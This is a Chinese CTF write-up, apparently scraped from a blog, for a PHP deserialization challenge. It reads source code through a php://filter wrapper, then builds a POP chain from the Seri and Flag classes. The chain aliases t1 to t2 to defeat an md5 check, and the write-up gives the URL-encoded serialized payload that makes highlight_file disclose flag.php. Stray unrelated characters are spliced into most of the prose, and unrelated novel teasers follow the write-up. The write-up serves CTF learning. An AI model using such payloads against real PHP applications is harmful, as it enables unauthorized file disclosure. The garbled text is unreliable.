[藍(lán)帽杯2020第四屆 線上賽]Soitgoes

題目
php反序列化,pop構(gòu)造玫坛,常規(guī)題
過程
1.index.php頁面右鍵查看源碼掂僵,感覺要用php偽協(xié)議去讀try.php

圖片.png

2.?file=php://filter/read=convert.base64-encode/resource=這次沒有過濾,直接讀到
index.php
圖片.png

try.php

<?php
class Seri{
    public $alize;
    public function __construct($alize) {
        $this->alize = $alize;
    }
    public function __destruct(){
        $this->alize->getFlag();
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;

    function __construct($file){
        $this->f = $file;
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    public function getFlag(){
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            if(isset($this->f)){
                echo @highlight_file($this->f,true);
            }
        }
    }
}

3.尋找pop鏈
Seri類中的魔法函數(shù)__destruct()使用getFlag()方法授嘀,F(xiàn)lag類中的getFlag()定義該方法。
構(gòu)造一個(gè)Flag類型的變量锣险,傳入的參數(shù)為flag.php蹄皱。$Flag=new Flag('flag.php');
構(gòu)造一個(gè)Seri類型的變量,傳入的參賽為$Flag芯肤,這樣銷毀$Flag的時(shí)候巷折,就會(huì)調(diào)用__destruct()。$test=new Seri($Flag)
在getFlag()方法中還有一個(gè)md5判斷崖咨,要使t1锻拘,t2值相等才可,其實(shí)不用。直接使用php的引用賦值即可署拟。

a=1;
b=&a;
a=a+1;

那末最后b得值也會(huì)變?yōu)?婉宰,因?yàn)閎是引用賦值。所以最終$Flag->t1 = &$Flag->t2;
最終payload

<?php
class Seri{
    public $alize;
    public function __construct($alize) {
        $this->alize = $alize;
    }
    public function __destruct(){
        $this->alize->getFlag();
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;

    function __construct($file){
        $this->f = $file;
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    public function getFlag(){
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            if(isset($this->f)){
                echo @highlight_file($this->f,true);
            }
        }
    }
}
$Flag=new Flag('flag.php');
$Flag->t1 = &$Flag->t2;
$test = new Seri($Flag);
echo urlencode(serialize($test));
?>
圖片.png

O%3A4%3A%22Seri%22%3A1%3A%7Bs%3A5%3A%22alize%22%3BO%3A4%3A%22Flag%22%3A3%3A%7Bs%3A1%3A%22f%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A2%3A%22t1%22%3Bs%3A32%3A%224a2ddf148c5a9c42151a529e8cbdcc06%22%3Bs%3A2%3A%22t2%22%3BR%3A4%3B%7D%7D0a49e3c3a03ebde64f85c0bacd8a08e20a49e3c3a03ebde64f85c0bacd8a08e2
4.只是這樣還不行推穷,觀察index.php心包,反序列化后傳給p。
最終payload:

url/?file=try.php&p=O%3A4%3A"Seri"%3A1%3A{s%3A5%3A"alize"%3BO%3A4%3A"Flag"%3A3%3A{s%3A1%3A"f"%3Bs%3A8%3A"flag.php"%3Bs%3A2%3A"t1"%3Bs%3A32%3A"8e98d81f8217304975ccb23337bb5761"%3Bs%3A2%3A"t2"%3BR%3A4%3B}}6e17a5fd135fcaf4b49f2860c2474c7c6e17a5fd135fcaf4b49f2860c2474c7c
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末馒铃,一起剝皮案震驚了整個(gè)濱河市蟹腾,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌区宇,老刑警劉巖娃殖,帶你破解...
    沈念sama閱讀 219,188評(píng)論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異议谷,居然都是意外死亡珊随,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,464評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門柿隙,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人鲫凶,你說我怎么就攤上這事禀崖。” “怎么了螟炫?”我有些...
    開封第一講書人閱讀 165,562評(píng)論 0 356
  • 文/不壞的土叔 我叫張陵波附,是天一觀的道長(zhǎng)。 經(jīng)常有香客問我昼钻,道長(zhǎng)掸屡,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,893評(píng)論 1 295
  • 正文 為了忘掉前任然评,我火速辦了婚禮仅财,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘碗淌。我一直安慰自己盏求,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,917評(píng)論 6 392
  • 文/花漫 我一把揭開白布亿眠。 她就那樣靜靜地躺著碎罚,像睡著了一般。 火紅的嫁衣襯著肌膚如雪纳像。 梳的紋絲不亂的頭發(fā)上荆烈,一...
    開封第一講書人閱讀 51,708評(píng)論 1 305
  • 那天,我揣著相機(jī)與錄音竟趾,去河邊找鬼憔购。 笑死宫峦,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的倦始。 我是一名探鬼主播斗遏,決...
    沈念sama閱讀 40,430評(píng)論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼鞋邑!你這毒婦竟也來了诵次?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,342評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤枚碗,失蹤者是張志新(化名)和其女友劉穎逾一,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體肮雨,經(jīng)...
    沈念sama閱讀 45,801評(píng)論 1 317
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡遵堵,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,976評(píng)論 3 337
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了怨规。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片陌宿。...
    茶點(diǎn)故事閱讀 40,115評(píng)論 1 351
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖波丰,靈堂內(nèi)的尸體忽然破棺而出壳坪,到底是詐尸還是另有隱情,我是刑警寧澤掰烟,帶...
    沈念sama閱讀 35,804評(píng)論 5 346
  • 正文 年R本政府宣布爽蝴,位于F島的核電站,受9級(jí)特大地震影響纫骑,放射性物質(zhì)發(fā)生泄漏蝎亚。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,458評(píng)論 3 331
  • 文/蒙蒙 一先馆、第九天 我趴在偏房一處隱蔽的房頂上張望发框。 院中可真熱鬧,春花似錦煤墙、人聲如沸缤底。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,008評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽个唧。三九已至,卻和暖如春设预,著一層夾襖步出監(jiān)牢的瞬間徙歼,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,135評(píng)論 1 272
  • 我被黑心中介騙來泰國(guó)打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留魄梯,地道東北人桨螺。 一個(gè)月前我還...
    沈念sama閱讀 48,365評(píng)論 3 373
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像酿秸,于是被迫代替她去往敵國(guó)和親灭翔。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,055評(píng)論 2 355